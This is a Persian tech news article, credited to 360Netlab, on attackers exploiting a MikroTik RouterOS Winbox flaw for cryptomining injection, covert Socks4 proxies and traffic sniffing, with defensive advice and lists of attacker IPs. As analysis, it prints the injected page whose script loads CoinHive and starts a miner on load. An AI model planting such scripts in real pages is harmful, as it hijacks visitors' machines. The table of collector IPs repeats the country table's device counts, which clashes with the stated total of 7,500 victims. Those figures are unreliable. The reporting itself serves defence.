روترهای میکروتیک اطلاعات کاربران را به مهاجمان ارسال می‌کنند

متخصصان امنیت به‌تازگی دریافته‌اند که بسیاری از اطلاعات روترهای میکروتیک شنود می‌شوند. IPهای ایرانی نیز در میان لیست شنودشدگان قرار دارند. با ما همراه باشید تا از جزئیات بیشتر و روش‌های مقابله با این شنودها آگاه شوید.

بررسی کلی

شرکت لتونیایی میکروتیک (MikroTik)، در سال ۱۹۹۶ برای توسعه روترها و سیستم‌های بی‌سیم ISP تأسیس شد. میکروتیک هم‌اکنون در سرتاسر جهان، سخت‌افزار و نرم‌افزار اتصال به اینترنت عرضه می‌کند. در سال ۱۹۹۷، میکروتیک سیستم نرم‌افزاری RouterOS را خلق کرد. در سال ۲۰۰۲، میکروتیک تصمیم گرفت سخت‌افزار اختصاصی خود را بسازد و برند RouterBOARD را ایجاد کرد. هر دستگاه RouterBOARD، از سیستم نرم‌افزاری RouterOS بهره می‌برد.

بنابر اسناد Vault7 که WikiLeaks منتشر کرده است، ابزار هک CIA، شیمِی قرمز (Chimay Red)، از دو حفره امنیتی در (Winbox (CVE-2018-14847 و Webfig استفاده می‌کند.

Winbox و Webfig هردو از اجزای مدیریتی RouterOS اند. Winbox یک نرم‌افزار مبتنی بر ویندوز و دارای رابط گرافیکی (GUI) است؛ در حالی که Webfig مبتنی بر وب عمل می‎‌کند. پورت‌‌های مشترک این دو نرم‌افزار TCP/8291، TCP/80 و TCP/8080 هستند.

سیستم‌های هانی‌پات، طعمه‌هایی برای شناسایی و انحراف حملات سایبری و خنثی‌سازی دسترسی‌های غیرمجاز هستند. از اواسط جولای (تیر)، سیستم هانی‌پات انگلرفیش (Anglerfish Honeypot System)، بدافزاری را که از نفوذپذیری CVE-2018-14847 استفاده می‌کرد تا فعالیت‌های مخرب گسترده‌ای را اجرا کند، شناسایی کرد. محققین امنیت برخی دیگر از این قبیل فعالیت‌ها مثل تزریق کد استخراج ارز دیجیتال به روش کوین‌هایو (CoinHive) را ردیابی کرده‌ بودند.

مهاجمان بیش از ۷۵۰۰ روتر میکروتیک را شنود می‌کنند

همچنین تعداد زیادی از افراد مشاهده شده‌اند که پروکسی ساکس۴ (Socks4) بر روی دستگاهشان توسط عاملی مشکوک فعال شده‌ است.

جالب‌تر آنکه ترافیک بیش از ۷۵۰۰ نفر به آی‌پی‌هایی که توسط مهاجمان ناشناس کنترل می‌شوند، ارسال می‌شود و بدین ترتیب این افراد شنود می‌شوند.

دستگاه‌های آسیب‌پذیر

از بین ۵ میلیون دستگاه ثبت‌شده با پورت TCP/8291 باز، ۱۲۰۰۰۰۰ (یک میلیون و دویست هزار) دستگاه متعلق به میکروتیک هستند که از این بین، ۳۷۰۰۰۰ (سیصد و هفتاد هزار) دستگاه (۳۰.۸۳%) به CVE-2018-14847، آسیب‌پذیرند.

نقشه آسیب پذیری میکروتیک

نقشه گسترش آسیب‌پذیری RouterOS

کشورتعداد دستگاه‌ها
برزیل۴۲۳۷۶
روسیه۴۰۷۴۲
اندونزی۲۲۴۴۱
هند۲۱۸۳۷
ایران۱۹۳۳۱
ایتالیا۱۶۵۴۳
لهستان۱۴۳۵۷
ایالات متحده۱۴۰۰۷
تایلند۱۲۸۹۸
اوکراین۱۲۷۲۰
چین۱۱۱۲۴
اسپانیا۱۰۸۴۲
آفریقای جنوبی۸۷۵۸
جمهوری چک۸۶۲۱
آرژانتین۶۸۶۹
کلمبیا۶۴۷۴
کامبوج۶۱۳۴
بنگلادش۵۵۱۲
اکوادور۴۸۵۷
مجارستان۴۱۶۲

بیشترین دستگاه‌های آسیب‌پذیر به تفکیک کشور

حملات

تزریق کد استخراج ارز دیجیتال به روش CoinHive

بعد از فعال‌سازی پروکسی HTTP در RouterOS، مهاجم از حقه‌ای استفاده کرده و تمامی درخواست‌های پروکسی HTTP را به یک صفحه‌ی لوکال ارور ۴۰۳ هدایت می‌کند. در این صفحه‌ی ارور، لینکی از coinhive.com برای استخراج (mining) ارز دیجیتال درج شده است. با این کار مهاجم امیدوار است تا بر روی تمامی ترافیک پروکسی دستگاه کاربر، استخراج انجام دهد.

نکته قابل توجه این است که کد ماینینگ به این صورت عمل نمی‌کند. تمامی منابع خارجی وب، از جمله منابع coinhive.com که برای استخراج ارز دیجیتال مورد نیاز است، توسط (ACL (Access Control Listهای پروکسی که توسط خود مهاجمان تعبیه شده‌، مسدود می‌شود.

# curl -i --proxy http://192.168.40.147:8080 http://netlab.360.com
HTTP/1.0 403 Forbidden  
Content-Length: 418  
Content-Type: text/html  
Date: Sat, 26 Aug 2017 03:53:43 GMT  
Expires: Sat, 26 Aug 2017 03:53:43 GMT  
Server: Mikrotik HttpProxy  
Proxy-Connection: close

<html>  
<head>  
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
   <title>"http://netlab.360.com/"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>  
<script>  
   var miner = new CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2});
   miner.start();
</script>  
</head>  
<frameset>  
<frame src="http://netlab.360.com/"></frame>  
</frameset>  
</html>  

پروکسی ساکس ۴ و 95.154.216.128/25 اسرارآمیز

در حال حاضر، پروکسی ساکس ۴ بر روی ۲۳۹ هزار دستگاه به‌طور مشکوکی فعال است. ساکس ۴ معمولاً از پورت TCP/4153 استفاده می‌کند. تنظیمات پروکسی ساکس ۴ فقط اجازه اتصال از آی‌پی‌های 95.154.216.128/25 را می‌دهد. مهاجمان برای به‌دست‌آوردن مجدد کنترل بعد از ریبوت دستگاه (تغییر آی‌پی)، دستگاه را طوری تنظیم می‌کنند تا به‌طور زمان‌بندی‌شده آخرین آی‌پی را با اتصال به آدرس (URL) مخصوص مهاجم گزارش کند.

همچنین مهاجم با استفاده از این پروکسی ساکس۴ آسیب‌پذیر، به‌دنبال دستگاه‌های RouterOS بیشتری می‌گردد.

هم‌اکنون، تمامی ۲۳۹ هزار دستگاه فقط اجازه دسترسی از 95.154.216.128/25 (غالباً 95.154.216.167) را می‌دهند. پی بردن به قصد مهاجمان از این تعداد پروکسی‌ ساکس ۴ دشوار است.

شنود

دستگاه‌های RouterOS به کاربران اجازه می‌دهد تا بسته‌‌های (Packet) روتر را گرفته و این ترافیک را به یک سرور خاص ارسال کنند. مهاجمان، ترافیک ۷.۵ هزار دستگاه RouterOS را به یک سری IPهای جمع‌کننده ارسال می‌کنند. در بین این آی‌پی‌ها، 37.1.207.114 نقش پررنگ‌تری داشته و ترافیک قابل توجهی از دستگاه‌ها به این مقصد ارسال می‌شود.

روتر میکروتیک

مهاجمان بیشتر به پورت‌های ۲۰، ۲۱، ۲۵، ۱۱۰ و ۱۴۳ علاقه دارند. این پورت ها به FTP، SMTP، POP3 و IMAP مربوط اند. همچنین پورت‌های ۱۶۱ و ۱۶۲، که مربوط به SNMP هستند، جزو پورت‌های محبوب مهاجمان محسوب می‌شوند. سوالی که پیش می‌آید این است که چرا مهاجمان پروتکل SNMP را، که به ندرت توسط کاربران استفاده می‌شود، مورد هدف قرار داده‌اند؟ آیا آن‌ها قصد شنود اطلاعات از کاربران خاصی ‌را دارند؟ هنوز پاسخ این سوال معلوم نیست.

آی‌پی جمع‌کنندهتعداد دستگاه‌ها
37.1.207.114۴۲۳۷۶
185.69.155.23۴۰۷۴۲
188.127.251.61۲۲۴۴۱
5.9.183.69۲۱۸۳۷
77.222.54.45۱۹۳۳۱
103.193.137.211۱۶۵۴۳
24.255.37.1۱۴۳۵۷
45.76.88.43۱۴۰۰۷
206.255.37.1۱۲۸۹۸

برترین مهاجمان

پورتتعداد دستگاه‌ها
۲۱۵۸۳۷
۱۴۳۵۸۳۲
۱۱۰۵۷۸۴
۲۰۴۱۶۵
۲۵۲۸۵۰
۲۳۱۳۲۸
۱۵۰۰۱۱۱۸
۸۰۸۳۱۰۹۵
۳۳۳۳۹۹۳
۵۰۰۰۱۹۸۴
۸۵۴۵۹۸۲
۱۶۱۶۷۷
۱۶۲۶۷۳
۳۳۰۶۳۵۵
۸۰۲۸۲
۸۰۸۰۲۴۳
۸۰۸۱۲۳۷
۸۰۸۲۲۳۰
۵۳۱۶۸
۲۰۴۸۱۶۷

پورت‌های شنود شده

کشورتعداد IPها
روسیه۱۶۲۸
ایران۶۳۷
برزیل۶۱۵
هند۵۹۴
اوکراین۵۴۴
بنگلادش۳۷۵
اندونزی۳۶۴
اکوادور۲۱۸
ایالات متحده۱۹۱
آرژانتین۱۸۹
کلمبیا۱۲۲
لهستان۱۱۳
کنیا۱۰۶
عراق۱۰۰
اتریش۹۲
اقیانوسیه۹۲
بلغارستان۸۵
اسپانیا۸۴
ایتالیا۶۹
آفریقای جنوبی۶۳
جمهوری چک۶۲
صربستان۵۹
آلمان۵۶
آلبانی۵۲
نیجریه۵۰
چین۴۷
هلند۳۹
ترکیه۳۸
کامبوج۳۷
پاکستان۳۲
انگلستان۳۰
اتحادیه اروپا۲۹
آمریکای لاتین۲۶
شیلی۲۵
مکزیک۲۴
مجارستان۲۲
نیکاراگوئه۲۰
رومانی۱۹
تایلند۱۸
پاراگوئه۱۶

تعداد قربانیان به تفکیک کشور

پیش‌گیری و مقابله

پیشنهاد می‌شود که کاربران RouterOS سیستم نرم‌افزاری خود را به‌طور منظم به‌روزرسانی کنند. همچنین بررسی کنند که پروکسی HTTP، پروکسی ساکس ۴ و ترافیک شبکه، مورد سوءاستفاده قرار نمی‌گیرد.

از میکروتیک انتظار می‌رود تا عدم اجازه دسترسی ورودی از اینترنت به Webfig و Winbox و بهبود سازوکار به‌روزرسانی‌های امنیتی را در دستور کار خود قرار دهد.

اطلاعات مهاجمان

نامIP
AS50673 Serverius Holding B.V.37.1.207.114
AS200000 Hosting Ukraine LTD185.69.155.23
AS56694 Telecommunication Systems, LLC188.127.251.61
AS24940 Hetzner Online GmbH5.9.183.69
AS44112 SpaceWeb Ltd77.222.54.45
AS22773 Cox Communications Inc.24.255.37.1
AS20473 Choopa, LLC45.76.88.43
AS53508 Cablelynx206.255.37.1
AS20860 iomart Cloud Services Limited.95.154.216.167

لیست مهاجمان

با توجه به حضور قابل توجه IPهای ایرانی در میان دستگاه‌های آسیب‌پذیر و شنودشده پیشنهاد می‌کنیم اگر از دستگاه‌های میکروتیک مجهز به RouterOS استفاده می‌کنید، هرچه سریع‌تر موارد اشاره‌شده در بخش پیش‌گیری و مقابله را بررسی کنید.

نظر شما در این رابطه چیست؟ آیا شما از دستگاه‌های میکروتیک استفاده می‌کنید؟ به نظر شما چه کسانی و با چه اهدافی در پشت این حملات هستند؟ دیدگاه‌های خود را با ما در میان بگذارید.

منبع 360Netlab

از سراسر وب

  دیدگاه
کاراکتر باقی مانده
تبلیغات

بیشتر بخوانید